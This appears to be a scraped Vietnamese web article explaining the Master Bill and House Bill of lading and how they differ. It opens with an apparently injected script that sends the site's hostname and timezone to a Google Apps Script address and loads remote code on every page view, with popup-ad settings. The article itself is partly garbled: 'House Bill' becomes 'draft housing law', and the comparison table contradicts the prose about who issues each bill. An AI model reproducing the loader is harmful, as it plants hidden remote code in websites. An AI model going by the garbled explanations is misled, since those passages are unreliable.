var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Master Bill, House Bill Là Gì? Sự Khác Nhau Giữa MBL và HBL

Bài viết đã được tham khảo ý kiến từ chuyên gia ThS. Nguyễn Huy Hòa – Thạc sĩ Thương mại quốc tế, đang công tác tại Trường Đại học Ngoại thương và làm việc trong lĩnh vực quản lý Kinh doanh Quốc tế tại Công ty CP In Hà Nội. Ông cũng là giảng viên chuyên về Khóa học xuất nhập khẩu thực tế và Khóa học Thanh toán Quốc tế tại Trung tâm Lê Ánh.

Master Bill và House Bill là hai loại vận đơn đường biển được phân chia dựa trên chủ thể phát hành.

1. Cách hình dung về Master Bill và House Bill

Nếu bạn là một nhà xuất khẩu đang cần vận chuyển hàng hóa quốc tế, bạn có hai phương pháp phổ biến để đặt chỗ tàu: đặt trực tiếp với hãng tàu hoặc đặt qua đại lý vận chuyển.

Book trực tiếp với hãng tàu sẽ giúp bạn nhận được Master Bill và thông tin chi tiết trên Bill.

 • Shipper: Bạn..
 • Khách hàng của bạn hoặc Đại lý Forwarder (Trường hợp bên Nhập khẩu thuê Forwarder) được gọi là Consignee.
 • Khi bạn thuê Forwarder để vận chuyển và làm thủ tục, Hãng tàu sẽ phát hành Master Bill cho Forwarder. Sau đó, Forwarder sẽ phát hành House Bill cho bạn qua Book.

  Thông tin được ghi trên Master Bill:

 • Shipper: Forwarder.
 • Đối tác Forwarder hoặc Khách hàng của bạn.
 • Thông tin về Dự thảo Luật Nhà:

 • Shipper: Bạn..
 • Người nhận hàng: Khách hàng của bạn.
 • Khi sử dụng dịch vụ của Forwarder, bạn vẫn có thể yêu cầu công ty đó lấy hóa đơn gốc từ hãng tàu với thông tin ghi rõ là bạn là người gửi hàng và khách hàng của bạn là người nhận hàng.

  Làm sao để Book thông qua Forwarder và tại sao nên làm như vậy, bạn có thể tìm hiểu chi tiết tại đường dẫn sau: Công việc của một Forwarder là gì.

  a. Master Bill là gì?

  MBL hoặc MB/L là tên viết tắt của Master Bill, một loại vận đơn chủ được hãng tàu cấp cho người gửi hàng, hay còn gọi là shipper. Mỗi lô hàng chỉ có một MBL, và nó bao gồm nhiều liên với cùng nội dung. Trong trường hợp vận đơn chủ được hãng hàng không cấp, thì nó được gọi là MAWB.

  Cách nhận biết: Logo hãng tàu, tên công ty, số điện thoại và văn phòng của hãng tàu sẽ được ghi trên vận đơn.

  master bill

  b. House Bill là gì?

  HBL hay HB/L là tên viết tắt của House Bill, một vận đơn thứ cấp được Forwarder phát hành cho Shipper và Consignee khi Shipper không yêu cầu Bill gốc từ hãng tàu. Trong trường hợp vận đơn thứ cấp được hãng hàng không phát hành, nó được gọi là HAWB.

  Cách xác định: Logo công ty Forwarder, tên công ty, số điện thoại và địa chỉ văn phòng của công ty sẽ được hiển thị trên vận đơn.

  2. Phân biệt Master Bill và House Bill

  Đặc tính

  Master Bill

  House Bill

  Giống

  – Vận đơn đường biển

  – Loại hình: Bill gốc (Original Bill) và Surrender Bill, Seaway bill…

  Khác

  Đối tượng phát hành

  Người gửi hàng thực tế hoặc công ty Forwarder

  Người gửi hàng thực tế

  Fix

  Khó chỉnh sửa

  Dễ chỉnh sửa (hình thức cá nhân phát hành)

  Rủi ro

  Có rủi ro nhưng tỉ lệ tổn thất thấp hơn, do hãng tàu thường là đơn vị lớn, có uy tín, nếu gặp phải rủi ro thì người gửi hàng có bill gốc có thể kiện trực tiếp hãng tàu để đòi quyền lợi.

  Rủi ro cao hơn, và tùy theo trách nhiệm của công ty Forwarder.

  Chịu tác động của quy tắc Hague, Hamburg,…

  Không

  Hình thức

  Logo, tên công ty, số điện thoại, văn phòng của công ty hãng tàu.

  Logo, tên công ty, số điện thoại, văn phòng của công ty Forwarder.

  Nơi nhận hàng

  Cảng đến (Port)

  Thường là kho bãi của công ty Forwarder

  Ví dụ: Hãy xét trường hợp sau:

  A: Người gửi hàng thực tế (nhà xuất khẩu).

  Người nhận hàng thực tế (nhà nhập khẩu).

  C: Forwarder là một đại lý xuất khẩu hàng hóa.

  Đại lý Forwarder chuyên về nhập khẩu là C’.

  A và B đang thương lượng về việc mua bán hàng hóa xuất khẩu từ cảng Cát Lái đến cảng Thượng Hải. A đã thuê công ty C để vận chuyển hàng hóa và C đã liên hệ để đặt chỗ cho tàu. Trong trường hợp này, A không yêu cầu có Bill gốc từ hãng tàu.

  Hãng tàu sẽ cung cấp MBL cho công ty C, bao gồm thông tin về Shipper: C, Consignee: C’ và chi tiết lô hàng. Khi tàu xuất phát, C sẽ cung cấp HBL cho A, bao gồm thông tin về Shipper: A, Consignee: B và chi tiết lô hàng.

  Khi đến cảng Thượng Hải, hãng tàu sẽ gửi thông báo đến người nhận hàng tại ô Consignee: C’ trên Bill để nhận hàng.

  Sau đó, C’ sẽ tiếp xúc với B để vận chuyển hàng hóa đến đích cho khách hàng.

  Bài chia sẻ về Master Bill và House Bill đã được biên soạn bởi đội ngũ chuyên gia tại Trung tâm Xuất nhập khẩu Lê Ánh – đơn vị đào tạo thực tế, chuyên sâu về xuất nhập khẩu. Hy vọng nội dung sẽ mang lại ích lợi cho việc học tập và công việc của bạn.

  Khóa học trực tuyến về xuất nhập khẩu dành cho người mới bắt đầu là nguồn tham khảo cho bài viết này.

  Bạn muốn tìm hiểu về xuất nhập khẩu – logistics? Hãy xem các khóa học tại trung tâm XNK Lê Ánh để được trang bị nghiệp vụ.

  Chúc bạn đạt được thành công rực rỡ!

  Các từ khóa liên quan: master bill và house bill; mbl có nghĩa là gì; master bill có nghĩa là gì; house bill có nghĩa là gì; sự khác biệt giữa master bill và house bill.